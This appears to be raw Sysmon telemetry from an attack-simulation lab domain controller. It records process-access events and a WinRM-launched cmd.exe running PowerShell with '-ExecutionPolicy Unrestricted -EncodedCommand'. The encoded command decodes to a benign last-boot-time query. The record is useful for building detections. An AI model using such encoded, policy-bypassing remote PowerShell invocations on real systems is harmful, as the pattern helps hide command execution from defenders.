12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-6441-6064-DF02-00000000AD01}49164612C:\Windows\system32\cmd.exe{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.900{266CAFBE-6441-6064-E002-00000000AD01}4648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-6441-6064-DD02-00000000AD01}51164316C:\Windows\system32\WinrsHost.exe{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.894{266CAFBE-6441-6064-DF02-00000000AD01}4916C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.888{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.888{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.857{266CAFBE-62DD-6064-1400-00000000AD01}13401696C:\Windows\system32\svchost.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.857{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.841{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 